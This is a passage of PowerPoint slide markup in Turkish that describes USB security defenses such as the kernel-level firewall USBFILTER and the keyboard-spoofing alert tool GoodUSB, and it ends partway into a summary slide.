              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>eden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>güvenlik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>duvarıdır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. USBFILTER, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Linux'ta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>uygulanır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>paketlere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>çekirdek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>düzeyinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>erişebilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>böylece</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>fiziksel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sanal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>aygıtları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>engelleyebilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bazı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>uygulamalardan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>aygıtları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kısıtlayabilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7207A378-690D-4ABF-87FC-B6BC4C10B4D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7856892" y="1682296"/>
            <a:ext cx="1728041"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GoodUSB</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1500" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08D9F645-DE2C-4A24-B3D9-3337A8BA4BDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7856892" y="2503560"/>
            <a:ext cx="1728041" cy="170180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800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>GoodUSB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>cihazlarının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullanıcının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>beklentilerine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>göre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>çalışmasını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sağlayan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>başka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>çekirdeği</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tabanlı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yazılımdır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>örneğin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullanıcının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> flash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sürücü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olduğunu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>düşündüğü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>cihaz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bilgisayara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>takılırsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>klavye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tanımlanırsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bunu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullanıcıya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bildirecektir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Metin kutusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A6D5D45-7FEF-405E-84FD-46254801B145}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="614320" y="800100"/>
            <a:ext cx="10129880" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>Bu savunmalar USB trafiğini, tuş vuruşlarını veya USB cihazının gönderdiği komutları analiz eder. Bunlardan herhangi biri sistemin önceden tanımlanmış kurallarına uymazsa, USB cihazı devre dışı bırakılır.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32562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A51-B735-463E-93C5-E1DCA8F234D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>özet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F13F306B-6255-4D2A-831E-CF6923EFFA96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913795" y="2096064"/>
            <a:ext cx="6220430" cy="3695136"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Evrensel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>seri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>veri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yolu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> (USB), modern </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bilgisayar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sistemleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yaygın</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullanılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>konektördür</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yazıcıları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kameraları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>depolama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ortamlarını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>diğer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>birçok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>farklı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>aygıtı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bağlamaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>hizmet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>eder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Günümüzde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>böyle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>portu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olmayan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>neredeyse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>hiçbir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bilgisayar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sistemi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>üretilmemektedir</a:t>
            </a:r>
            <a:r>
